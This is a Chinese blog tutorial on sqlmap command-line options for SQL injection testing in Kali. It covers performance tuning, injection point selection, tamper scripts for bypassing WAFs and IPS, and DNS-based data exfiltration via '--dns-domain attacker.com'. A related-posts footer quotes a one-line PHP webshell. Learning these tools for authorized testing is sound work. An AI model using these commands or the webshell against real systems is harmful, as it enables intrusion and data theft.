小白日记45:kali渗透测试之Web渗透-SqlMap自动注入(三)-sqlmap参数详解-Optimization,Injection,Detection,Techniques,Fingerprint
sqlmap自动注入
Optimization

【优化性能参数,可提高效率】
-o:指定前三个参数(--predict-output、--keep-alive、--null-connection)
--predict-output:
根据检测方法,比岁返回值和统计表内容,不断缩小检测范围,提高检测效率
可检测的返回值:版本名、用户名、密码、Privaleges、role、数据库名称、表名、列名
与--threads参数不兼容
统计表:/usr/share/sqlmap/txt/common-outputs.txt
--keep-alive:【可避免出现异常连接很大的情况,而触发报警】
使用http(s)长连接,性能好
与--proxy参数不兼容
长连接避免重复建立连接的网络开销,但大量长连接会严重占用服务器资源
--null-connection:
只获取相应页面的大小值,而非页面具体内容
通常用于盲注判断 真/假,降低网络带宽消耗
与--text-only参数不兼容(基于页面内容的比较判断 真/假)
--threads:【默认情况下为1】
最大并发线程
盲注是每个线程获取一个字符(7次请求<--低位ASCII码),获取完成后线程结束
默认值为1,建议不要超过10,否则可能影响站点可用性
与--predict-output参数不兼容
Injection

-p:
指定扫描的参数,除了该参数,不探测其他参数,使--level失效
-p "User-Agent,referer" #指定此两个参数

--skip:
排除指定的扫描参数
--level=5 --skip="id,user-agent"
URI注入点:【若URL地址中变量的名称和值,都通过URL表示(看起来像目录),需要手动在变量后加一个星号作为标志】(URI与URL)
sqlmap -u "http://targeturl/value1*/param2/value2/"
##############################################################################
#伪静态页面,URL重写,实际上只是看起来像是一个静态页面【如何识别伪静态页面】
##############################################################################
--dbms: 【指定扫描服务器的数据库类型】
--ddbms="mysql"

--os:
Linux/Windows
--invalid-bignum / --invalid-logical
通常sqlmap使用负数使参数取值失效,即id=13->id=13
bignum使用大数使参数值失效 id==99999999999
Logical使用布尔判断使取值失效 id=13 AND 18=19
--no-cast
榨取数据时,sqlmap将所有结果转换为字符串,并用空格代替NULL结果
在老版本mysql数据库需要开启此开关
--no-escape【sqlmap默认下几乎没有通过编码逃逸的配置】
出于混淆和避免出错的目的,payload中用单引号界定字符串时,sqlmap使用char()编码逃逸的方法替换字符串
###SELECT 'foo' --》SELECT CHAR(102)+CHAR(111)+CHAR(111)
本参数关闭此功能
--prefix / --suffix 【前缀/后缀】
$query = "SELECT * FROM users WHERE id=(’" . $_GET[’id’] . "’) LIMIT 0, 1";
##如:sqlmap -u "http://1.1.1.1/sqlmap/mysql/get_str_brackets.php?id=1" -p id
--prefix "’)" --suffix "AND (’abc’=’abc“
query = "SELECT * FROM users WHERE id=(’1’) <PAYLOAD> AND
(’abc’=’abc’) LIMIT 0, 1";
--tamper 【前提:发现扫描被过滤】
指定混淆脚本,同于绕过应用层过滤、IPS、WAF
sqlmap -u "http://dadad" --
#脚本位置:/usr/share.sqlmap/tamper 【可使用dpkg -L sqlmap | grep tam 筛选】
sqlmap -u "http://URL" --tamper="tamper/between.py.tamper/randomcase.py.tamper/space2comment.py" -v 3 #【-v:显示详细信息】
Detection【检测】

--level
1-5级 (默认1)
/usr/share/sqlmap/xml/payloads
--risk
1-4 (默认1/无害)
Risk升高可造成数据被篡改等风险 (update)
--string,--not-string,--regexp,--code,--text-only,--titles 【指定根据返回的类型作为注入判断依据】
页面比较,基于布尔的注入检测,依据返回页面内容的变化判断真假逻辑,但有些页面岁时间刻度变化,此时需要认为指定标识真假的字符串
Techniques 【检测SQL注入存在的技术类型】

默认使用全部技术
B:Boolean-based blind
E:Error-based
U:Union query-based
S:Stacked queries (文件系统、操作系统、注册表时,必须使用)
T:Time-based Blind
--time-sec
基于时间的注入检测响应延迟时间(默认5秒)
--union-cols
默认联合查询1-10列,随--level增加最多支持50列
--union-clos 6-9
--union-char
联合查询默认使用NULL,极端情况下NULL可能失效,此时可手动指定数值
--union-char 123 【需事先对web application进行分析】
--dns-domain
场景:攻击者控制了某DNS服务器,使用此功能可以提高数据榨取速率
--dns-domain attacker.com
--second-order
在一个页面注入的结果,从另一个页面体现出来
--second-order http://1.1.1.1/b.php
Fingerprint【指纹信息】

-f,--fingerprint,-b,---banner
数据库管理系统指纹信息
DBMS,操作系统,架构,补丁
小白日记45:kali渗透测试之Web渗透-SqlMap自动注入(三)-sqlmap参数详解-Optimization,Injection,Detection,Techniques,Fingerprint的更多相关文章
- 小白日记46:kali渗透测试之Web渗透-SqlMap自动注入(四)-sqlmap参数详解- Enumeration,Brute force,UDF injection,File system,OS,Windows Registry,General,Miscellaneous
sqlmap自动注入 Enumeration[数据枚举] --privileges -U username[CU 当前账号] -D dvwa -T users -C user --columns [ ...
- 小白日记44:kali渗透测试之Web渗透-SqlMap自动注入(二)-sqlmap参数详解REQUEST
Sqlmap自动注入(二) Request ################################################### #inurl:.php?id= 1. 数据段:--d ...
- 小白日记43:kali渗透测试之Web渗透-SqlMap自动注入(一)-sqlmap参数详解TARGET
SqlMap自动注入(一) sqlmap是一款非常强大的开源sql自动化注入工具,可以用来检测和利用sql注入漏洞[动态页面中get/post参数.cookie.HTTP头].它由Python语言开发 ...
- 小白日记28:kali渗透测试之Web渗透-扫描工具-Nikto
扫描工具-Nikto #WEB渗透 靶机:metasploitable 靶场:DVWA[默认账号/密码:admin/password] #新手先将DVWA的安全性,调到最低,可容易发现漏洞 侦察[减少 ...
- 小白日记30:kali渗透测试之Web渗透-扫描工具-Skipfish
WEB渗透-skipfish Skipfish是一个命令行模式,以C语言编写的积极的Web应用程序的安全性侦察工具,没有代理模式. 它准备了一个互动为目标的网站的站点地图进行一个递归爬网和基于字典的探 ...
- 小白日记34:kali渗透测试之Web渗透-扫描工具-Burpsuite(二)
扫描工具-Burpsuite 公共模块 0.Spider 爬网 手动爬网 先禁用截断功能 手动将页面中点击所有连接,对提交数据的地方,都进行提交[无论内容] 自动爬网[参数设置] 指定爬网路径,否则其 ...
- 小白日记47:kali渗透测试之Web渗透-XSS(一)
XSS [推荐书籍:XSS跨站脚本攻击剖析与防御] xss表示Cross Site Scripting(跨站脚本攻击),它与SQL注入攻击类似,SQL注入攻击中以SQL语句作为用户输入,从而达到查询/ ...
- 小白日记51:kali渗透测试之Web渗透-WebShell(中国菜刀、WeBaCoo、Weevely)
webshell 本质:<?php echo shell_exec($_GET['cmd']);?> windows平台 中国菜刀官网:胖客户端程序,国产中比较优秀的webshell,适用 ...
- 小白日记54:kali渗透测试之Web渗透-补充概念(AJAX,WEB Service)
补充概念 AJAX(异步javascript和XML) Asynchronous javascript and xml 是一个概念,而非一种新的编程语言,是一组现有技术的组合 通过客户端脚本动态更新页 ...
随机推荐
- js运动 分享到
<!doctype html> <html> <head> <meta charset = "utf-8"> <title&g ...
- 服务器多块磁盘 ,同时磁盘类型混合(SSD+STAT+SAS)
服务器多块磁盘 ,同时磁盘类型混合(SSD+STAT+SAS)
- jquery让一个点击事件刷新页面就自己执行一次的方法
$('name')这个元素之前已经绑定过事件啦,(on绑定)然后直接调用下即可: $('name').click();
- 深入浅出谈存储之NAS是什么
深入浅出谈存储之NAS是什么 2012年02月17日16:42 来源:新浪博客 作者:林沛满 编辑:曾智强 查看全文 赞(0)评论(0) 分享 标签: NAS , 企业NAS , 存储系统 [IT16 ...
- 第一百九十二天 how can I 坚持
早上去中关村森林公园跑了会步,下午看了部电影<夏洛特烦恼>,感觉电影跟我看的那部小说差不多,还是挺不错的. 睡觉.
- 关于文章“cocos2dx移植android平台-我的血泪史”需要注意事项
关于文章"cocos2dx移植android平台-我的血泪史"需要注意事项 在上次转载的这篇文章中,按照配置一步一步的下去.发现工程中在Android.mk中有一处错误.直接bui ...
- tomcat 粗略笔记
GlobalNamingResources 存在于server.xml中,定义全局公共数据源,如果host中有大量引用相同的数据源,那么可以都配在这里 <GlobalNamingResource ...
- stm32 usb数据接收与数据发送程序流程分析
http://blog.csdn.net/u011318735/article/details/17424349 既然学习了USB,那就必须的搞懂USB设备与USB主机数据是怎么通讯的.这里主要讲设备 ...
- nyoj117 求逆序数
求逆序数 时间限制:2000 ms | 内存限制:65535 KB 难度:5 描述 在一个排列中,如果一对数的前后位置与大小顺序相反,即前面的数大于后面的数,那么它们就称为一个逆序.一个排列中 ...
- hdu 1171 Big Event in HDU(多重背包+二进制优化)
题目链接:hdu1171 思路:将多重背包转为成完全背包和01背包问题,转化为01背包是用二进制思想,即件数amount用分解成若干个件数的集合,这里面数字可以组合成任意小于等于amount的件数 比 ...